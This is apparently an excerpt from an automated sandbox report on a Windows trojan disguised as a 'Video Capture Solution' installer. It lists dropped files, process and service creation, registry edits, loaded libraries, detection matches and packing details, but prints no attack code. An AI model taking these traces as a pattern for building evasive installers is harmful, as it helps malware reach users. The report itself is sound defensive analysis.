                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6093FAD64_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6096DAE84_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_6094DA3A4_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60936B274_2_60936B27
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60954CF64_2_60954CF6
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60950C6B4_2_60950C6B
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60966DF14_2_60966DF1
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60963D354_2_60963D35
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60909E9C4_2_60909E9C
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60951E864_2_60951E86
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60912E0B4_2_60912E0B
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_60954FF84_2_60954FF8
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DCE24D4_2_02DCE24D
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DBF0794_2_02DBF079
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DD4EE94_2_02DD4EE9
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DD2E744_2_02DD2E74
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DCE6654_2_02DCE665
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DC9F444_2_02DC9F44
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DCACFA4_2_02DCACFA
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DCDD594_2_02DCDD59
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DC85034_2_02DC8503
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DEBF804_2_02DEBF80
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DEBF314_2_02DEBF31
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DEB4E54_2_02DEB4E5
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\EShineEncoder\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: String function: 0040595C appears 116 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: String function: 00403400 appears 61 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: String function: 00406AB4 appears 41 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: String function: 00445DCC appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: String function: 004344D4 appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: String function: 0044609C appears 59 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: String function: 00408BFC appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: String function: 00457D3C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: String function: 00403494 appears 82 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: String function: 004078E4 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: String function: 00453318 appears 93 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: String function: 00457B30 appears 94 times
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: String function: 00403684 appears 221 times
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: String function: 02DC8BA0 appears 37 times
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: String function: 02DD53F0 appears 139 times
                    Source: AbC0LBkVhr.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: AbC0LBkVhr.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: AbC0LBkVhr.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: AbC0LBkVhr.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-U1N6A.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-U1N6A.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-U1N6A.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.4.drStatic PE information: Number of sections : 19 > 10
                    Source: is-NF0AU.tmp.1.drStatic PE information: Number of sections : 19 > 10
                    Source: AbC0LBkVhr.exe, 00000000.00000003.1707129879.0000000002340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs AbC0LBkVhr.exe
                    Source: AbC0LBkVhr.exe, 00000000.00000003.1707546902.0000000002118000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs AbC0LBkVhr.exe
                    Source: AbC0LBkVhr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@10/31@1/2
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DC08C0 FormatMessageA,GetLastError,FormatMessageA,GetLastError,4_2_02DC08C0
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555B8
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_00455DE0 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455DE0
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: CreateServiceA,4_2_004022D9
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpCode function: 1_2_0046DF04 GetVersion,CoCreateInstance,1_2_0046DF04
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_0040D1AC StartServiceCtrlDispatcherA,4_2_0040D1AC
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_0040D1AC StartServiceCtrlDispatcherA,4_2_0040D1AC
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile created: C:\Users\user\AppData\Local\Video Capture Solution 1.33Jump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_03
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeFile created: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmpJump to behavior
                    Source: Yara matchFile source: 4.0.videocapturesolution32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000000.1722687638.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2974303192.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\EShineEncoder\EShineEncoder.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-3B09G.tmp, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: videocapturesolution32.exe, videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: videocapturesolution32.exe, videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: videocapturesolution32.exe, videocapturesolution32.exe, 00000004.00000003.1732730596.0000000000929000.00000004.00000020.00020000.00000000.sdmp, videocapturesolution32.exe, 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp, is-NF0AU.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: AbC0LBkVhr.exeReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeFile read: C:\Users\user\Desktop\AbC0LBkVhr.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\AbC0LBkVhr.exe "C:\Users\user\Desktop\AbC0LBkVhr.exe"
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeProcess created: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp "C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp" /SL5="$20416,3526895,54272,C:\Users\user\Desktop\AbC0LBkVhr.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause video_capture_solution_11223
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe "C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe" -i
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause video_capture_solution_11223
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeProcess created: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp "C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp" /SL5="$20416,3526895,54272,C:\Users\user\Desktop\AbC0LBkVhr.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause video_capture_solution_11223Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpProcess created: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe "C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe" -iJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause video_capture_solution_11223Jump to behavior
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\AbC0LBkVhr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Video Capture Solution_is1Jump to behavior
                    Source: AbC0LBkVhr.exeStatic file information: File size 3774004 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-297HU.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-MJRUC.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-297HU.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-GSMNO.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-MJRUC.tmp.1.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeUnpacked PE file: 4.2.videocapturesolution32.exe.400000.0.unpack _rste_2:ER;_rstf_2:R;_rstg_2:W;.rsrc:R;_rsth_2:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeUnpacked PE file: 4.2.videocapturesolution32.exe.400000.0.unpack
